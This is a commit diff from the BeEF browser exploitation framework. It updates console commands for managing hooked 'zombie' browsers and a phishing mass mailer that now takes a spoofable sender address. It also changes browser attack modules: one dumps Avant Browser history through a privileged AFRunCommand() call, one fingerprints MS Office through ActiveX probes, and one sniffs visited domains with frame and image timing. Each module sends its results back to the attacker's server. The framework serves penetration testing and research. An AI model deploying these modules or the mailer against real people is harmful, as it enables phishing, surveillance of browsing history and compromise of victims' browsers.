for(index in record.data.data) { for(index in record.data.data) {
result = record.data.data[index]; result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
index = index.toString().replace('_', ' '); index = index.toString().replace('_', ' ');
//output escape everything, but allow the <br> tag for better rendering. // Check if the data is the image parameter and that it's a base64 encoded png.
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>')); if (result.substring(0,28) == "image=data:image/png;base64,") {
// Lets display the image
try {
base64_data = window.atob(result.substring(29,result.length));
html += String.format('<img src="{0}" /><br>', result.substring(6));
} catch(e) {
beef.debug("Received invalid base64 encoded image string: "+e.toString());
html += String.format('<b>{0}</b>: {1}<br>', index, result);
}
} else {
// output escape everything, but allow the <br> tag for better rendering.
html += String.format('<b>{0}</b>: {1}<br>', index, result);
}
} }
html += '</p>'; html += '</p>';
return html; return html;
} }

10
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
View File

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
id = data.id; id = data.id;
}, },
error: function(){ error: function(){
console.log("Error getting module id."); beef.debug("Error getting module id.");
} }
}); });
return id; return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
async: false, async: false,
processData: false, processData: false,
success: function(data){ success: function(data){
console.log("data: " + data.command_id); beef.debug("data: " + data.command_id);
result = "Command [" + data.command_id + "] sent successfully"; result = "Command [" + data.command_id + "] sent successfully";
}, },
error: function(){ error: function(){
console.log("Error sending command"); beef.debug("Error sending command");
return "Error sending command"; return "Error sending command";
} }
}); });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
processData: false, processData: false,
success: function(data){ success: function(data){
$jwterm.each(data, function(i){ $jwterm.each(data, function(i){
console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data); beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
results += $jwterm.parseJSON(data[i].data).data; results += $jwterm.parseJSON(data[i].data).data;
}); });
}, },
error: function(){ error: function(){
console.log("Error sending command"); beef.debug("Error sending command");
return "Error sending command"; return "Error sending command";
} }
}); });

39
extensions/console/lib/command_dispatcher/command.rb
View File

@@ -10,9 +10,18 @@ module CommandDispatcher
class Command class Command
include BeEF::Extension::Console::CommandDispatcher include BeEF::Extension::Console::CommandDispatcher
@@params = []
def initialize(driver) def initialize(driver)
super super
begin
driver.interface.cmd['Data'].each{|data|
@@params << data['name']
}
rescue
return
end
end end
def commands def commands
@@ -41,12 +50,16 @@ class Command
} }
print_line("Module name: " + driver.interface.cmd['Name']) print_line("Module name: " + driver.interface.cmd['Name'])
print_line("Module category: " + driver.interface.cmd['Category']) print_line("Module category: " + driver.interface.cmd['Category'].to_s)
print_line("Module description: " + driver.interface.cmd['Description']) print_line("Module description: " + driver.interface.cmd['Description'])
print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0 print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
driver.interface.cmd['Data'].each{|data| driver.interface.cmd['Data'].each{|data|
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label']) if data['type'].eql?("combobox")
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
else
print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
end
} if not driver.interface.cmd['Data'].nil? } if not driver.interface.cmd['Data'].nil?
end end
@@ -80,6 +93,16 @@ class Command
print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values") print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
print_status(" Usage: param <paramname> <paramvalue>") print_status(" Usage: param <paramname> <paramvalue>")
end end
def cmd_param_tabs(str,words)
return if words.length > 1
if @@params == ""
#nothing prepopulated?
else
return @@params
end
end
def cmd_execute(*args) def cmd_execute(*args)
@@bare_opts.parse(args) {|opt, idx, val| @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
]) ])
if args[0] == nil if args[0] == nil
lastcmdid = nil
driver.interface.getcommandresponses.each do |resp| driver.interface.getcommandresponses.each do |resp|
indiresp = driver.interface.getindividualresponse(resp['object_id']) indiresp = driver.interface.getindividualresponse(resp['object_id'])
respout = "" respout = ""
@@ -126,6 +150,7 @@ class Command
respout = "No response yet" respout = "No response yet"
else else
respout = Time.at(indiresp[0]['date'].to_i).to_s respout = Time.at(indiresp[0]['date'].to_i).to_s
lastcmdid = resp['object_id']
end end
tbl << [resp['object_id'].to_s, resp['creationdate'], respout] tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
end end
@@ -133,6 +158,16 @@ class Command
puts "\n" puts "\n"
puts "List of responses for this command module:\n" puts "List of responses for this command module:\n"
puts tbl.to_s + "\n" puts tbl.to_s + "\n"
if not lastcmdid.nil?
resp = driver.interface.getindividualresponse(lastcmdid)
puts "\n"
print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
print_line("Response:")
resp.each do |op|
print_line(op['data']['data'].to_s)
end
end
else else
output = driver.interface.getindividualresponse(args[0]) output = driver.interface.getindividualresponse(args[0])
if output.nil? if output.nil?

35
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -141,13 +141,14 @@ class Core
[ [
'Id', 'Id',
'IP', 'IP',
'Hook Host',
'Browser', 'Browser',
'OS', 'OS',
'Hardware' 'Hardware'
]) ])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie| BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')] tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end end
puts "\n" puts "\n"
@@ -174,12 +175,14 @@ class Core
[ [
'Id', 'Id',
'IP', 'IP',
'Hook Host',
'Browser', 'Browser',
'OS' 'OS',
'Hardware'
]) ])
BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie| BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')] tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end end
puts "\n" puts "\n"
@@ -283,12 +286,21 @@ class Core
offlinezombies << zombie.id offlinezombies << zombie.id
end end
if not offlinezombies.include?(args[0].to_i) targets = args[0].split(',')
print_status("Browser does not appear to be offline..") targets.each {|t|
return false if not offlinezombies.include?(t.to_i)
end print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
return false
end
#print_status("Adding browser [id:"+t.to_s+"] to target list.")
}
# if not offlinezombies.include?(args[0].to_i)
# print_status("Browser does not appear to be offline..")
# return false
# end
if not driver.interface.setofflinetarget(args[0]).nil? if not driver.interface.setofflinetarget(targets).nil?
if (driver.dispatcher_stack.size > 1 and if (driver.dispatcher_stack.size > 1 and
driver.current_dispatcher.name != 'Core') driver.current_dispatcher.name != 'Core')
driver.destack_dispatcher driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
if driver.interface.targetid.length > 1 if driver.interface.targetid.length > 1
driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ") driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
else else
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ") driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
end end
end end
@@ -327,7 +339,12 @@ class Core
driver.run_single("offline") driver.run_single("offline")
when 'commands' when 'commands'
if driver.dispatched_enstacked(Target) if driver.dispatched_enstacked(Target)
if args[1] == "-s" and not args[2].nil?
driver.run_single("commands #{args[1]} #{args[2]}")
return
else
driver.run_single("commands") driver.run_single("commands")
end
else else
print_error("You aren't targeting a zombie yet") print_error("You aren't targeting a zombie yet")
end end

46
extensions/console/lib/command_dispatcher/target.rb
View File

@@ -18,7 +18,7 @@ class Target
begin begin
driver.interface.getcommands.each { |folder| driver.interface.getcommands.each { |folder|
folder['children'].each { |command| folder['children'].each { |command|
@@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
} }
} }
rescue rescue
@@ -40,17 +40,29 @@ class Target
@@bare_opts = Rex::Parser::Arguments.new( @@bare_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help." ]) "-h" => [ false, "Help." ])
@@commands_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help."],
"-s" => [ false, "<search term>"],
"-r" => [ false, "List modules which have responses against them only"])
def cmd_commands(*args) def cmd_commands(*args)
searchstring = nil
responly = nil
@@bare_opts.parse(args) {|opt, idx, val| @@commands_opts.parse(args) {|opt, idx, val|
case opt case opt
when "-h" when "-h"
cmd_commands_help cmd_commands_help
return false return false
when "-s"
searchstring = args[1].downcase if not args[1].nil?
when "-r"
responly = true
end end
} }
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Columns' => 'Columns' =>
[ [
@@ -63,10 +75,29 @@ class Target
driver.interface.getcommands.each { |folder| driver.interface.getcommands.each { |folder|
folder['children'].each { |command| folder['children'].each { |command|
tbl << [command['id'].to_i,
folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"), cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
if not searchstring.nil?
if not cmdstring.downcase.index(searchstring).nil?
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""), command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] #TODO driver.interface.getcommandresponses(command['id']).length] #TODO
end
elsif not responly.nil?
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
else
tbl << [command['id'].to_i,
cmdstring,
command['status'].gsub(/^Verified /,""),
driver.interface.getcommandresponses(command['id']).length] #TODO
end
} }
} }
@@ -78,6 +109,9 @@ class Target
def cmd_commands_help(*args) def cmd_commands_help(*args)
print_status("List command modules for this target") print_status("List command modules for this target")
print_line("Usage: commands [options]")
print_line
print @@commands_opts.usage()
end end
def cmd_info(*args) def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
else else
driver.interface.getcommands.each { |x| driver.interface.getcommands.each { |x|
x['children'].each { |y| x['children'].each { |y|
if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_") if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
modid = y['id'] modid = y['id']
end end
} }

11
extensions/console/lib/shellinterface.rb
View File

@@ -302,6 +302,7 @@ class ShellInterface
['Browser Components', 'Windows Media Player','HasWMP'], ['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'], ['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit', 'HasFoxit'], ['Browser Components', 'Foxit', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'], ['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'], ['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'], ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -310,7 +311,7 @@ class ShellInterface
['Hooked Page', 'Page Title', 'PageTitle'], ['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'], ['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'], ['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'], ['Hooked Page', 'Hook Host', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'], ['Hooked Page', 'Cookies', 'Cookies'],
# Host # Host
@@ -328,22 +329,22 @@ class ShellInterface
case p[2] case p[2]
when "BrowserName" when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2])) data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
when "ScreenSize" when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width'] width = screen_size_hash['width']
height = screen_size_hash['height'] height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth'] cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}" data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize" when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width'] width = window_size_hash['width']
height = window_size_hash['height'] height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}" data = "Width: #{width}, Height: #{height}"
else else
data = BD.get(zombie_session, p[2]) data = BD.get(self.targetsession, p[2])
end end
# add property to summary hash # add property to summary hash

2
extensions/social_engineering/config.yaml
View File

@@ -21,7 +21,7 @@ beef:
use_auth: true use_auth: true
use_tls: true use_tls: true
helo: "gmail.com" # this is usually the domain name helo: "gmail.com" # this is usually the domain name
from: "youruser@gmail.com" auth: "youruser@gmail.com"
password: "yourpass" password: "yourpass"
# available templates # available templates
templates: templates:

68
extensions/social_engineering/mass_mailer/mass_mailer.rb
View File

@@ -20,14 +20,14 @@ module BeEF
@host = @config.get("#{@config_prefix}.host") @host = @config.get("#{@config_prefix}.host")
@port = @config.get("#{@config_prefix}.port") @port = @config.get("#{@config_prefix}.port")
@helo = @config.get("#{@config_prefix}.helo") @helo = @config.get("#{@config_prefix}.helo")
@from = @config.get("#{@config_prefix}.from") @auth = @config.get("#{@config_prefix}.auth")
@password = @config.get("#{@config_prefix}.password") @password = @config.get("#{@config_prefix}.password")
end end
# tos_hash is an Hash like: # tos_hash is an Hash like:
# 'antisnatchor@gmail.com' => 'Michele' # 'antisnatchor@gmail.com' => 'Michele'
# 'ciccio@pasticcio.com' => 'Ciccio' # 'ciccio@pasticcio.com' => 'Ciccio'
def send_email(template, fromname, subject, link, linktext, tos_hash) def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
# create new SSL context and disable CA chain validation # create new SSL context and disable CA chain validation
if @config.get("#{@config_prefix}.use_tls") if @config.get("#{@config_prefix}.use_tls")
@ctx = OpenSSL::SSL::SSLContext.new @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
n = tos_hash.size n = tos_hash.size
x = 1 x = 1
print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:" print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
print_info "subject: #{subject}" print_info "subject: #{subject}"
print_info "link: #{link}" print_info "link: #{link}"
print_info "linktext: #{linktext}" print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
if @config.get("#{@config_prefix}.use_auth") if @config.get("#{@config_prefix}.use_auth")
smtp.start(@helo, @from, @password, :login) do |smtp| smtp.start(@helo, @auth, @password, :login) do |smtp|
tos_hash.each do |to, name| tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template) message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to) smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent." print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1 x += 1
end end
end end
else else
smtp.start(@helo, @from) do |smtp| smtp.start(@helo, @auth) do |smtp|
tos_hash.each do |to, name| tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template) message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to) smtp.send_message(message, fromaddr, to)
print_info "Mail #{x}/#{n} to [#{to}] sent." print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1 x += 1
end end
@@ -67,33 +67,39 @@ module BeEF
end end
end end
def compose_email(fromname, to, name, subject, link, linktext, template) def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
msg_id = random_string(50) begin
boundary = "------------#{random_string(24)}" msg_id = random_string(50)
rel_boundary = "------------#{random_string(24)}" boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
images = "" header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image| plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary) rel_header = email_related(rel_boundary)
end html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
attachments = "" images = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment| images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary) end
end
end
close = email_close(boundary) attachments = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
end
end
message = header + plain_body + rel_header + html_body + images + attachments + close close = email_close(boundary)
print_debug "Raw Email content:\n #{message}" rescue Exception => e
message print_error "Error constructing email."
raise
end
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
end end
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary) def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

17
extensions/social_engineering/rest/socialengineering.rb
View File

@@ -70,6 +70,7 @@ module BeEF
# "template": "default", # "template": "default",
# "subject": "Hi from BeEF", # "subject": "Hi from BeEF",
# "fromname": "BeEF", # "fromname": "BeEF",
# "fromaddr": "beef@beef.com",
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx", # "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
# "linktext": "http://beefproject.com", # "linktext": "http://beefproject.com",
# "recipients": [{ # "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
template = body["template"] template = body["template"]
subject = body["subject"] subject = body["subject"]
fromname = body["fromname"] fromname = body["fromname"]
fromaddr = body["fromaddr"]
link = body["link"] link = body["link"]
linktext = body["linktext"] linktext = body["linktext"]
if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil? if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
print_error "All parameters are mandatory." print_error "All parameters are mandatory."
halt 401 halt 401
end end
@@ -106,11 +108,16 @@ module BeEF
halt 401 halt 401
end end
end end
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
rescue Exception => e rescue Exception => e
print_error "Invalid JSON input passed to endpoint /api/seng/clone_page" print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
error 400
end
begin
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
rescue Exception => e
print_error "Invalid mailer configuration"
error 400 error 400
end end
end end

38
modules/browser/avant_steal_history/command.js
View File

@@ -15,37 +15,33 @@
// //
beef.execute(function() { beef.execute(function() {
if (!beef.browser.isA()) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
return;
}
var avant_iframe = document.createElement("iframe"); var avant_iframe = document.createElement("iframe");
//var avant_iframe = beef.dom.createInvisibleIframe(); //var avant_iframe = beef.dom.createInvisibleIframe();
avant_iframe.setAttribute('src', "browser:home"); avant_iframe.setAttribute('src', 'browser:home');
avant_iframe.setAttribute('name','test2'); avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
avant_iframe.setAttribute('width','0'); avant_iframe.setAttribute('width', '0');
avant_iframe.setAttribute('heigth','0'); avant_iframe.setAttribute('heigth', '0');
avant_iframe.setAttribute('scrolling','no'); avant_iframe.setAttribute('scrolling','no');
avant_iframe.setAttribute('style', 'display:none');
document.body.appendChild(avant_iframe); document.body.appendChild(avant_iframe);
var vstr = {value: ""}; var vstr = {value: ""};
if(window['test2'].navigator) { if (window['avant_history_<%= @command_id %>'].navigator) {
//This works if FF is the rendering engine //This works if FF is the rendering engine
window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr); window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
} else {
// this works if Chrome is the rendering engine
//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
} }
else {
// this works if Chrome is the rendering engine
//window['test2'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
}
}); });

4
modules/browser/avant_steal_history/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true enable: true
category: "Browser" category: "Browser"
name: "Get Visited URLs (Avant Browser)" name: "Get Visited URLs (Avant Browser)"
description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history." description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
authors: ["Roberto Suggi Liverani"] authors: ["Roberto Suggi Liverani"]
target: target:
working: ["ALL"] working: ["FF"]

44
modules/browser/detect_office/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var ma = 1;
var mb = 1;
var mc = 1;
var md = 1;
try {
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
} catch (e) {}
try {
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
} catch (e) {}
try {
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
} catch (e) {}
try {
md = new ActiveXObject("SharePoint.OpenDocuments.1")
} catch (e) {}
var a = typeof ma;
var b = typeof mb;
var c = typeof mc;
var d = typeof md;
var key = "No Office Found";
if (a == "object" && b == "object" && c == "object" && d == "object") {
key = "Office 2010"
}
if (a == "number" && b == "object" && c == "object" && d == "object") {
key = "Office 2007"
}
if (a == "number" && b == "number" && c == "object" && d == "object") {
key = "Office 2003"
}
if (a == "number" && b == "number" && c == "number" && d == "object") {
key = "Office Xp"
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
});

16
modules/browser/detect_office/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_office:
enable: true
category: "Browser"
name: "Detect MS Office"
description: "This module detect the version of MS Office if installed"
authors: ["nbblrr"]
target:
working: ["IE"]
not_working: ["All"]

14
modules/browser/detect_office/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_office < BeEF::Core::Command
def post_execute
content = {}
content['office'] = @datastore['office']
save content
end
end

147
modules/browser/get_visited_domains/command.js
View File

@@ -133,7 +133,7 @@ if (beef.browser.isIE() == 1) {
var MAX_ATTEMPTS = 1; var MAX_ATTEMPTS = 1;
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
/**************** /****************
* SCANNED URLS * * SCANNED URLS *
****************/ ****************/
@@ -212,7 +212,7 @@ function perform_check() {
if (beef.browser.isFF() == 1) { if (beef.browser.isFF() == 1) {
setTimeout(wait_for_read, 1); setTimeout(wait_for_read, 1);
} }
if(beef.browser.isC() == 1 || beef.browser.isO() == 1){ if(beef.browser.isO() == 1){
setTimeout(wait_for_read, 1); setTimeout(wait_for_read, 1);
} }
} }
@@ -242,11 +242,10 @@ function wait_for_read() {
setTimeout(wait_for_read, 0); setTimeout(wait_for_read, 0);
} }
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
try{ try{
if(frames['f'].location.href != 'about:blank'){
throw 1; if(frames['f'].location.href != 'about:blank') throw 1;
}
frames['f'].stop(); frames['f'].stop();
document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"'; document.getElementById('f').src = 'javascript:"<body onload=\'parent.frame_ready = true\'>"';
@@ -280,7 +279,7 @@ function navigate_to_target() {
if (beef.browser.isIE() == 1) { if (beef.browser.isIE() == 1) {
setTimeout(wait_for_noread, 0); setTimeout(wait_for_noread, 0);
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
setTimeout(wait_for_noread, 1); setTimeout(wait_for_noread, 1);
} }
urls++; urls++;
@@ -318,7 +317,7 @@ function wait_for_noread() {
} }
sched_call(wait_for_noread); sched_call(wait_for_noread);
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1){ if (beef.browser.isO() == 1){
if (frames['f'].location.href == undefined){ if (frames['f'].location.href == undefined){
confirm_visited = true; confirm_visited = true;
throw 1; throw 1;
@@ -343,7 +342,7 @@ function maybe_test_next() {
if (beef.browser.isIE() == 1) { if (beef.browser.isIE() == 1) {
document.getElementById("f").src = 'about:blank'; document.getElementById("f").src = 'about:blank';
} }
if (beef.browser.isC() == 1 || beef.browser.isO() == 1) { if (beef.browser.isO() == 1) {
document.getElementById('f').src = 'about:blank'; document.getElementById('f').src = 'about:blank';
} }
if (target_off < targets.length) { if (target_off < targets.length) {
@@ -396,7 +395,7 @@ function reload(){
/* The handler for "run the test" button on the main page. Dispenses /* The handler for "run the test" button on the main page. Dispenses
advice, resets state if necessary. */ advice, resets state if necessary. */
function start_stuff() { function start_stuff() {
if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isC() == 1 || beef.browser.isO() == 1) { if (beef.browser.isFF() == 1 || beef.browser.isIE() == 1 || beef.browser.isO() == 1) {
target_off = 0; target_off = 0;
attempt = 0; attempt = 0;
confirmed_visited = false; confirmed_visited = false;
@@ -409,11 +408,139 @@ function start_stuff() {
} }
} }
/**************/
/***Visipisi***/
/**************/
var vp_result = {};
var visipisi = {
webkit: function(url, cb) {
var start;
var loaded = false;
var runtest = function() {
window.removeEventListener("message", runtest, false);
var img = new Image();
start = new Date().getTime();
try{
img.src = url;
} catch(e) {}
var messageCB = function (e){
var now = new Date().getTime();
if (img.complete) {
delete img;
window.removeEventListener("message", messageCB, false);
cbWrap(true);
} else if (now - start > 10) {
